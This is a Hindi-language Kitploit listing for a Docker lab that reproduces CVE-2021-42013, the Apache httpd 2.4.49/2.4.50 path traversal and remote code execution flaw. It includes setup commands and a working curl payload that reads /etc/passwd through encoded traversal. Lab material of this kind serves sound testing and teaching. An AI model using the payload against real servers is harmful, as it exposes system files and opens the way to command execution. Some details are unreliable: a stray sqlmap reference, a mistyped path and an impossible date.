Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2021-42013-httpd — CVE: 2021-42013 Tested on: 2.4.49 and 2.4.50 Description: Apache 2.4.49 और 2.4.50 में पथ ट्रैवर्सल या रिमोट कोड निष्पादन कमजोरियाँ | Kitploit
उपकरण/GitHubGitHub/cybfar/cve-2021-42013-httpd
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubcybfar/cve-2021-42013-httpd

cve-2021-42013-httpd

CVE: 2021-42013 Tested on: 2.4.49 and 2.4.50 Description: Apache 2.4.49 और 2.4.50 में पथ ट्रैवर्सल या रिमोट कोड निष्पादन कमजोरियाँ

रिपॉजिटरी देखें
113 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

एक भेद्यता का डॉकरीकरण: cve-2021-42013

यह परियोजना Docker का उपयोग करके एक विशिष्ट भेद्यता को डॉकरीकृत करने का लक्ष्य रखती है। उद्देश्य एक पृथक वातावरण बनाना है जिसमें भेद्यता का सुरक्षित रूप से शोषण और परीक्षण किया जा सके।

भेद्य अनुप्रयोग

Apache HTTP Server 2.4.50 - Remote Code Execution && Path Transversal

स्थापना

इस परियोजना को चलाने के लिए, आपके मशीन पर निम्नलिखित होना चाहिए:

  • Docker
  • Python
  • Curl

एक बार पूर्वापेक्षाएँ स्थापित हो जाने पर, आप इस Git रिपॉजिटरी को अपने मशीन पर क्लोन कर सकते हैं:

root@kitploit:~
  git clone https://github.com/cybfar/cve-2021-42013-httpd.git

  cd Ccve-2021-42013-httpd

एक बार निर्देशिका में आने पर, नीचे दिए गए कमांड को चलाकर भेद्य वातावरण तैयार करें:

root@kitploit:~
  docker build -t apache-httpd-vuln .
  docker run -p 8000:80 apache-httpd-vuln

फिर http://localhost:8000 पते पर एप्लिकेशन तक पहुँचें। यदि सब ठीक रहा, तो आपको "It works" प्रदर्शित होता दिखाई देना चाहिए।

भेद्यता का शोषण

curl के साथ इस पेलोड को नीचे चलाने से हमें पता चलता है कि लक्ष्य भेद्य है। स्क्रिप्ट भेद्यता का शोषण करने के लिए उपयुक्त sqlmap कमांड उत्पन्न करेगी।

root@kitploit:~
  curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd

यह पेलोड उपयोगकर्ता की सहमति के बिना सिस्टम में उपयोगकर्ता से संबंधित जानकारी तक सीधे पहुँच सकता है।

एक बार जब हम सर्वर पर cgi या cgid मॉड्यूल सक्रिय कर देंगे, तो यह भेद्यता एक हमलावर को मनमानी कमांड निष्पादित करने की अनुमति देगी।

टूल डाउनलोड करें